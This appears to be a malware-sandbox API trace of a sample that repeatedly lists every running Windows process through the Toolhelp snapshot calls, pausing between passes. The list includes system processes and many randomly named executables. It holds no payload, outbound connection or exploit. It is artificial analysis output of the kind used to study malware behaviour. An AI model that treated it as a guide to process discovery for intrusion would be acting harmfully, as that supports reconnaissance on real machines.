[0146.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.414] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0146.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0146.521] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0146.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.529] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0146.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0146.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0146.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0146.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0146.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0146.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0146.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0146.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0146.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0146.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0146.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0146.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0146.550] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0146.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0146.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0146.553] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0146.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0146.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0146.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0146.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0146.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0146.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0146.626] CloseHandle (hObject=0xbc) returned 1 [0146.626] Sleep (dwMilliseconds=0x12c) [0146.945] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0146.951] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0146.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.956] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0146.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.961] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0146.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.970] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0146.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0146.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0146.978] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0147.025] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0147.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0147.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0147.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0147.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0147.033] 